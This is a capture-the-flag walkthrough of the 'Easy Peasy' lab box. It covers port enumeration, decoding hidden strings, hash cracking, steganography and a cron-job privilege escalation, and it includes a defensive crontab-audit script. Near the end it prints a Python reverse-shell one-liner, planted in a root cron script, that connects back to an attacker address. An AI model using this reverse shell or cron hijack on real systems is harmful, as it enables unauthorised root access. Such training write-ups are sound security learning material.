Easy Peasy

Port 80 enumeration - Port 65524 enumeration - Steganography - Encodings - CronJob PrivEsc

Initial Compromise

  • Running a simple Nmap scan is not enough to detect all open ports, since 2 of the services are not listening on standard ports. You'll need to run Nmap with the -p- flag to discover all 3 running services

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
  • Using gobuster against the Nginx service running on port 80/tcp allows the discovery of a /hidden directory

kali@kali:/data/Easy_Peasy/files$ gobuster dir -u http://10.10.105.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.105.32
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/24 10:08:01 Starting gobuster
===============================================================
/hidden (Status: 301)
  • Further enumerating this directory leads to a /hidden/whatever/ location

  • Analysing the page source reveals a hidden paragraph containing an encoded string

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32/hidden/whatever/
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
    background-repeat: no-repeat;
    background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>
  • The string is base64 encoded

$ echo -n "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d
flag{REDACTED}

Apache Enumeration

  • Simply visiting the /robots.txt page gives us two hints

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions
  • The first hint: we'll have to change the User-Agent header to a18672860d0510e5ab6699730763b250 to get further

  • The second hint: the User-Agent value itself looks fishy, maybe it's an MD5 hash. Yes, it is flag 2 :)

  • The main page shows a standard Apache page, but hints have been hidden in the source code of that page

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep flag
          <a href="#flag">hi</a>
                           Fl4g 3 : flag{REDACTED}
  • Still in the source code of the main page, we can find a hidden paragraph with an encoded string

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep hidden
    <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
  • It decodes to /n0th1ng3ls3m4tt3r with base62
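
Working through the "ba...." hint with a small decoder, as an added example that is not part of the original writeup: it reads the string as one big base62 number using the GMP/CyberChef alphabet (digits, then upper case, then lower case), which is an assumption confirmed by the round trip, and shows why base64 is ruled out (that decoding is not printable text).

```python
import base64
import string

# Alphabet used by GMP and CyberChef's "From Base62": digits, then upper, then lower case.
BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

# The hidden paragraph's value, copied from the page above.
HINT = "ObsJmP173N2X6dOrAgEAL0Vu"


def base62_decode(text, alphabet=BASE62_ALPHABET):
    """Read text as one big-endian base62 integer and return its bytes."""
    value = 0
    for ch in text:
        value = value * 62 + alphabet.index(ch)  # ValueError for chars outside the alphabet
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def base62_encode(data, alphabet=BASE62_ALPHABET):
    """Inverse of base62_decode, used to confirm a decoding round-trips."""
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 62)
        digits.append(alphabet[rem])
    return "".join(reversed(digits)) or alphabet[0]


def is_printable_ascii(data):
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def readable_decodings(text):
    """Try the decoders the 'ba....' hint could mean; keep only results that read as text."""
    results = {}
    try:
        out = base64.b64decode(text, validate=True)
        if is_printable_ascii(out):
            results["base64"] = out
    except ValueError:  # binascii.Error is a ValueError subclass
        pass
    try:
        out = base62_decode(text)
        if is_printable_ascii(out):
            results["base62"] = out
    except ValueError:
        pass
    return results
```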

  • Browsing the location gathered previously reveals a hash

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/
<html>
<head>
<title>random title</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
    background-color:black;


    }
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>
  • Let's crack this hash (GOST R 34.11-94 format) with John the Ripper, using the wordlist provided in the challenge, easypeasy.txt

kali@kali:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt
kali@kali:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • The page found just previously also contains a jpg file. Let's download the picture and extract the secret with steghide, using the password cracked just before (mypasswordforthatjob)

kali@kali:/data/Easy_Peasy/files$ wget http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
kali@kali:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg 
Enter passphrase: 
wrote extracted data to "secrettext.txt".
kali@kali:/data/Easy_Peasy/files$ cat secrettext.txt 
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
  • This file gives us a username (boring) and a binary-encoded password, which decodes to iconvertedmypasswordtobinary. We can now SSH in (port 6498) and get a shell on the box :)

Privilege Escalation

  • The user is not in the sudoers file, but there is a cron job executed by root

boring@kral4-PC:~$ sudo -l
[sudo] password for boring: 
Sorry, user boring may not run sudo on kral4-PC.

boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
  • The script is owned by our user, so we can modify it

boring@kral4-PC:~$ ls -l /var/www/.mysecretcronjob.sh 
-rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/.mysecretcronjob.sh
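
From the defender's side, a small audit of the same crontab, as an added example that is not part of the original writeup: it lists root jobs whose referenced files a non-root user owns or can write to, resolving the "cd /var/www/ && ... .mysecretcronjob.sh" pattern that hides the script path. The FAKE_FS entries (including uid 1000 for boring) are constructed so it runs offline; real_stat runs the same check against the live filesystem.

```python
import os
import re
import shlex
import stat

# Constructed excerpt of the /etc/crontab shown above.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
"""
# Constructed (uid, mode) pairs that stand in for os.stat so the audit runs offline.
FAKE_FS = {
    "/etc/cron.hourly": (0, stat.S_IFDIR | 0o755),
    "/var/www/.mysecretcronjob.sh": (1000, stat.S_IFREG | 0o755),  # uid 1000 = boring
}

def real_stat(path):
    try:
        st = os.stat(path)
        return st.st_uid, st.st_mode
    except OSError:
        return None  # path does not exist

def audit_crontab(text, stat_fn=real_stat):
    """Return (path, reason) for files used by root jobs that a non-root user can change.
    Relative arguments are resolved against a preceding 'cd DIR &&', which is how the
    job above hides its script; commands found via $PATH are not resolved."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment or variable assignment
        fields = line.split(None, 6)  # 5 time fields, user, command
        if len(fields) < 7 or fields[5] != "root":
            continue
        cwd = "/"
        for segment in re.split(r"&&|\|\||;", fields[6]):
            words = shlex.split(segment)
            if words[:1] == ["cd"] and len(words) > 1:
                cwd = words[1]
                continue
            for word in words:
                path = os.path.normpath(os.path.join(cwd, word))
                info = None if word.startswith("-") else stat_fn(path)
                if info and info[0] != 0:
                    findings.append((path, f"owned by uid {info[0]}, not root"))
                elif info and info[1] & (stat.S_IWGRP | stat.S_IWOTH):
                    findings.append((path, "group- or world-writable"))
    return findings
```

Run audit_crontab(open("/etc/crontab").read()) on a real host; an empty list means every file a root job touches is root-owned and not group/world-writable.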

boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh 
#!/bin/bash
# i will run as root

  • After adding a reverse shell one-liner to the script (connecting back to the attacker's listener), it looks like this

boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  • Start a listener and get R00T :)
